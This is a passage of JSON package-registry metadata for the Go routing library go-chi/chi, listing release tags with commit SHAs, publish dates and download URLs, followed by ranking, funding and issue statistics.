hi/chi/releases/tag/v4.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.3/manifests"},{"name":"v3.3.5","sha":"8f7c7827792ffe0506ef6bf0d2e85d1ddfd89a20","kind":"commit","published_at":"2023-09-07T09:46:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.5","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.5/manifests"},{"name":"v2.1.1","sha":"052d563ff595f7c360284be323a8ef4c41e1d761","kind":"commit","published_at":"2023-09-07T09:44:41.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.1/manifests"},{"name":"v1.5.5","sha":"bbb989dcdf2943dd4cc8bc3381057cb632d1e73e","kind":"commit","published_at":"2023-09-07T09:35:12.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.5","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.5/manifests"},{"name":"v5.0.10","sha":"99bc99e0bf0edc147e82765f2848167922a5c644","kind":"commit","published_at":"2023-07-13T16:01:44.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.10","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.10/manifests"},{"name":"v5.0.9","sha":"cfd6c464dacfc6199e3f6155faf9cb3e57be0a95","kind":"commit","published_at":"2023-07-13T15:37:56.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.9","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.9/manifests"},{"name":"v5.0.8","sha":"da69873df486639c64f3b1f90abf69c943c17554","kind":"commit","published_at":"2022-12-07T13:23:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.8","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.8/manifests"},{"name":"v5.0.7","sha":"0316d5a1df8598eceb137f5f77945be56810b564","kind":"commit","published_at":"2021-11-18T21:56:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.7","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.7/manifests"},{"name":"v5.0.6","sha":"66d6a4d9814d8d8a3816c730e18f5219f263412b","kind":"commit","published_at":"2021-11-15T21:30:54.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.6","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.6/manifests"},{"name":"v5.0.5","sha":"b9a8b9d0a092f57ce4ca3896c40ea36e482c9b6c","kind":"commit","published_at":"2021-10-27T11:12:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.5","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.5/manifests"},{"name":"v5.0.4","sha":"181551d0e5acd337ac7be6f4b7f71e9151c969dc","kind":"commit","published_at":"2021-08-29T14:34:40.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.4","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.4/manifests"},{"name":"v5.0.3","sha":"f16f8704ccc32f63fbc20eb364c41050cf339860","kind":"commit","published_at":"2021-04-29T22:40:05.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.3","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.3/manifests"},{"name":"v5.0.2","sha":"2283e4951adbd82c8f6427117bd6b2a1c315e725","kind":"commit","published_at":"2021-03-25T13:04:21.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.2","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.2/manifests"},{"name":"v5.0.1","sha":"5086f887c59f4c582f871e1de651b6e62e51c377","kind":"commit","published_at":"2021-03-10T12:43:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.1/manifests"},{"name":"v5.0.0","sha":"fe3708ee6c7bf30623c33ca1b8005182c392ff3f","kind":"commit","published_at":"2021-02-28T00:11:55.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.0/manifests"},{"name":"v1.5.4","sha":"c9e87efe9691a63d6a89de8bbd16b04fe4d6640e","kind":"commit","published_at":"2021-02-27T20:52:54.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.4","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.4/manifests"},{"name":"v1.5.3","sha":"7ea741287f73376032e7d4fee8fd6e371313bfa7","kind":"commit","published_at":"2021-02-21T20:28:20.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.3","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"e3bfca4f25703c66c9347e2a430dd88e3198b5f7","kind":"commit","published_at":"2021-02-10T19:44:42.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.2","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"f61ec8cf7c33c662ca78b6b2aac0e68f4729dfd6","kind":"commit","published_at":"2020-12-06T18:50:37.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.1","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"b6287654fc97544b16619d9c6284b0d90d6b2289","kind":"commit","published_at":"2020-11-12T22:54:47.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.0","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.0/manifests"},{"name":"v4.1.2","sha":"86f9a6e7ce9bf453eaa339b51f88f586edbccbc1","kind":"commit","published_at":"2020-06-02T19:02:25.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.2","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.2/manifests"},{"name":"v4.1.1","sha":"1fafc30c1d76663042337e150b02fbacdce3466c","kind":"commit","published_at":"2020-04-16T12:17:06.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"183768ed5df7d0b039500727c380bfbaf9229c81","kind":"commit","published_at":"2020-04-01T19:42:39.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.0/manifests"},{"name":"v4.0.4","sha":"1f2d16707ca3418c2bd151747b5059387fa088ba","kind":"commit","published_at":"2020-03-24T15:11:21.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.4","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.4/manifests"},{"name":"v4.0.3","sha":"2db61557f36b2f4caa20ce6ef50e98bac0f7fce5","kind":"commit","published_at":"2020-01-09T22:01:35.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.3","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.3/manifests"},{"name":"v4.0.2","sha":"da24bba8dcd4021cafac38724bf10dccc97c3e36","kind":"commit","published_at":"2019-02-26T16:20:03.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.2","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.2/manifests"},{"name":"v4.0.1","sha":"1a6bb108ccf279c8dac6f9bad857d773b4f9b421","kind":"commit","published_at":"2019-01-17T22:35:40.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.1","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"e95203758b2a6ec24a8e97124d5719ffe5ec1374","kind":"commit","published_at":"2019-01-10T15:56:14.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.0/manifests"},{"name":"v3.3.4","sha":"08d9051ef6546d57c5dca8eae13e6df362e2d568","kind":"commit","published_at":"2019-01-08T01:17:51.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.4","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.4/manifests"},{"name":"v3.3.3","sha":"b5294d10673813fac8558e7f47242bc9e61b4c25","kind":"commit","published_at":"2018-08-27T20:34:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.3","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.3/manifests"},{"name":"v3.3.2","sha":"e83ac2304db3c50cf03d96a2fcd39009d458bc35","kind":"commit","published_at":"2017-12-22T16:11:33.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.2","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.2/manifests"},{"name":"v3.3.1","sha":"687d2792aedd8e8ac3bbd8592cf55b91d7ea8ce9","kind":"commit","published_at":"2017-11-20T15:19:03.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.1/manifests"},{"name":"v3.3.0","sha":"f7c66f685bcab06bcce78ac212c5f3553c063d19","kind":"commit","published_at":"2017-10-10T22:11:38.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.0/manifests"},{"name":"v3.2.1","sha":"04ec7fc4179604b2390947258f9143eaae23b596","kind":"commit","published_at":"2017-09-01T02:07:29.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.2.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.1/manifests"},{"name":"v3.2.0","sha":"ba73ba0623af32e4e5f09880177e73bd78d98852","kind":"commit","published_at":"2017-08-22T17:58:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.2.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.0/manifests"},{"name":"v3.1.5","sha":"25354a53cca531cb2efd3f1d3c565d90ff04d802","kind":"commit","published_at":"2017-08-02T21:27:05.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.5","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.5/manifests"},{"name":"v3.1.4","sha":"b8567b6442e27704bfeb725095091581cbe82a00","kind":"commit","published_at":"2017-07-27T15:16:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.4","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.4/manifests"},{"name":"v3.1.3","sha":"524a020446146841512dd1639e736422e7af53a4","kind":"commit","published_at":"2017-07-25T17:24:32.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.3","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.3/manifests"},{"name":"v3.1.2","sha":"7e6b856011d49775bb45d829339287a416a85f66","kind":"commit","published_at":"2017-07-24T20:38:22.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.2","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.2/manifests"},{"name":"v3.1.1","sha":"12a98d329f12aac9e94b72c713437350c948a5e2","kind":"commit","published_at":"2017-07-21T14:22:28.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.1/manifests"},{"name":"v3.1.0","sha":"08660a0ad10a8fa7beab3ad43afe66373d49d06a","kind":"commit","published_at":"2017-07-10T19:19:16.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"967844826e58cf31213a7dfb82455d242ad85101","kind":"commit","published_at":"2017-06-21T19:28:24.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.0.0/manifests"},{"name":"v2.1.0","sha":"e6033ea75479391a4bce3918fc119cad31e1cb30","kind":"commit","published_at":"2017-03-30T18:41:17.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"54f435d539226571eab1987ed862b1c0fdfdc892","kind":"commit","published_at":"2017-01-06T20:47:52.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.0.0/manifests"},{"name":"v1.0.0","sha":"dcbb8f81eea01aaaa5b6f9bffc229e9e9e0256bb","kind":"commit","published_at":"2016-06-22T21:59:16.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.0.0/manifests"},{"name":"v0.9.0","sha":"c420d7fbf4428b27e31d83591e5e2267d84f9f20","kind":"commit","published_at":"2016-03-31T13:51:57.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v0.9.0","html_url":"https://github.com/go-chi/chi/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v0.9.0/manifests"}]},"repo_metadata_updated_at":"2026-08-08T10:51:35.219Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":6.115015678513658,"dependent_packages_count":5.730225644084185,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":5.922620661298922},"purl":"pkg:golang/github.com/go-%21chi/%21chi","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/github.com/go-Chi/Chi","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/go/github.com/go-Chi/Chi","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/github.com/go-Chi/Chi/dependencies","status":null,"funding_links":["https://github.com/sponsors/pkieltyka"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-05T21:35:35.662Z","issues_count":173,"pull_requests_count":264,"avg_time_to_close_issue":12477255.268518519,"avg_time_to_close_pull_request":9586229.069148935,"issues_closed_count":108,"pull_requests_closed_count":187,"pull_request_authors_count":141,"issue_authors_count":161,"avg_comments_per_issue":3.098265895953757,"avg_comments_per_pull_request":0.9204545454545454,"merged_pull_requests_count":106,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":13,"past_year_pull_requests_count":81,"past_year_avg_time_to_close_issue":2306211.8,"p